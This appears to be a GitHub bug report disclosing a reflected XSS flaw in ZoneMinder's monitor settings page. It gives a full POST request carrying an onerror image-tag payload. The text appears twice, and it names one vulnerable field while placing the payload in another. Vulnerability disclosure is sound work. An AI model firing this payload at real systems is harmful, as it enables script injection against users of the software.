Describe the bug
The view monitor, insecurely prints the newMonitor[V4LCapturesPerFrame] value on the webpage, without applying any proper filtration, leading to Reflected XSS.
POST Data - view=monitor&tab=source&action=monitor&mid=0&newMonitor[LinkedMonitors]=&origMethod=v4l2&newMonitor[Name]=Monitor1766&newMonitor[ServerId]=&newMonitor[StorageId]=1&newMonitor[Type]=Local&newMonitor[Function]=Mocord&newMonitor[Enabled]=1&newMonitor[RefBlendPerc]=6&ne wMonitor[AlarmRefBlendPerc]=6&newMonitor[AnalysisFPSLimit]=&newMonitor[MaxFPS]=30&newMonitor[AlarmMaxFPS]=30&newMonitor[Triggers] []=&newMonitor[Protocol]=&newMonitor[Host]=&newMonitor[Port]=80&newMonitor[Options]=&newMonitor[Path]=&newMonitor[User]=&newMonitor[Pass]=&newMonitor[Save JPEGs]=0&newMonitor[VideoWriter]=1&newMonitor[EncoderParameters]=# Lines beginning with # are a comment # For changing quality, use the crf option # 1 is best, 51 is worst quality #crf=23&newMonitor[RecordAudio]=0&newMonitor[RTSPDescribe]=0&newMonitor[LabelFormat]=%N - %d/%m/%y %H:%M:%S&newMonitor[LabelX]=0&newMonitor[LabelY]=0&newMonitor[LabelSize]=1&newMonitor[ImageBufferCount]=20&newMonitor[WarmupCount]=0&newMonitor[PreEve ntCount]=0&newMonitor[PostEventCount]=5&newMonitor[StreamReplayBuffer]=0&newMonitor[AlarmFrameCount]=1&newMonitor[EventPrefix]=Event&newMonitor[SectionLength]=600&newMonitor[FrameSkip]=0&newMonitor[MotionFrameSkip]=0&newMonitor[AnalysisUpdateDelay]=0&newMonitor[FPSReportInterval]=100&newMonitor[DefaultView]=Events&newMonitor[DefaultRate]=100&newMonitor[DefaultScale]=100&newMonitor[WebColour]=red&newMonitor[Exif]=0&newMonitor[SignalCheckP oints]=10&newMonitor[SignalCheckColour]=#0000c0&newMonitor[Device]=/dev/video0&newMonitor[Method]=&newMonitor[Channel]=0&newMonitor[Format]=255&newMonito r[Palette]=0&newMonitor[V4LMultiBuffer]="><img src=x onerror=prompt('1');>&newMonitor[V4LCapturesPerFrame]=&newMonitor[Colours]=\&newMonitor[Width]=1280&newMonitor[Height]=720 &newMonitor[Orientation]=0&newMonitor[Deinterlacing]=0
Payload used - "><img src=x onerror=prompt('1');>
Navigate to the Affected URL, Payload would be triggered.
Expected behavior
Proper escaping of special characters.
Debug Logs
None
The text was updated successfully, but these errors were encountered:
Describe Your Environment
Describe the bug
The view
monitor, insecurely prints thenewMonitor[V4LCapturesPerFrame]value on the webpage, without applying any proper filtration, leading to Reflected XSS.To Reproduce
Affected URL :
http://localhost/zm/index.php
POST Data -
view=monitor&tab=source&action=monitor&mid=0&newMonitor[LinkedMonitors]=&origMethod=v4l2&newMonitor[Name]=Monitor1766&newMonitor[ServerId]=&newMonitor[StorageId]=1&newMonitor[Type]=Local&newMonitor[Function]=Mocord&newMonitor[Enabled]=1&newMonitor[RefBlendPerc]=6&ne wMonitor[AlarmRefBlendPerc]=6&newMonitor[AnalysisFPSLimit]=&newMonitor[MaxFPS]=30&newMonitor[AlarmMaxFPS]=30&newMonitor[Triggers] []=&newMonitor[Protocol]=&newMonitor[Host]=&newMonitor[Port]=80&newMonitor[Options]=&newMonitor[Path]=&newMonitor[User]=&newMonitor[Pass]=&newMonitor[Save JPEGs]=0&newMonitor[VideoWriter]=1&newMonitor[EncoderParameters]=# Lines beginning with # are a comment # For changing quality, use the crf option # 1 is best, 51 is worst quality #crf=23&newMonitor[RecordAudio]=0&newMonitor[RTSPDescribe]=0&newMonitor[LabelFormat]=%N - %d/%m/%y %H:%M:%S&newMonitor[LabelX]=0&newMonitor[LabelY]=0&newMonitor[LabelSize]=1&newMonitor[ImageBufferCount]=20&newMonitor[WarmupCount]=0&newMonitor[PreEve ntCount]=0&newMonitor[PostEventCount]=5&newMonitor[StreamReplayBuffer]=0&newMonitor[AlarmFrameCount]=1&newMonitor[EventPrefix]=Event&newMonitor[SectionLength]=600&newMonitor[FrameSkip]=0&newMonitor[MotionFrameSkip]=0&newMonitor[AnalysisUpdateDelay]=0&newMonitor[FPSReportInterval]=100&newMonitor[DefaultView]=Events&newMonitor[DefaultRate]=100&newMonitor[DefaultScale]=100&newMonitor[WebColour]=red&newMonitor[Exif]=0&newMonitor[SignalCheckP oints]=10&newMonitor[SignalCheckColour]=#0000c0&newMonitor[Device]=/dev/video0&newMonitor[Method]=&newMonitor[Channel]=0&newMonitor[Format]=255&newMonito r[Palette]=0&newMonitor[V4LMultiBuffer]="><img src=x onerror=prompt('1');>&newMonitor[V4LCapturesPerFrame]=&newMonitor[Colours]=\&newMonitor[Width]=1280&newMonitor[Height]=720 &newMonitor[Orientation]=0&newMonitor[Deinterlacing]=0Payload used -
"><img src=x onerror=prompt('1');>Expected behavior
Debug Logs
The text was updated successfully, but these errors were encountered: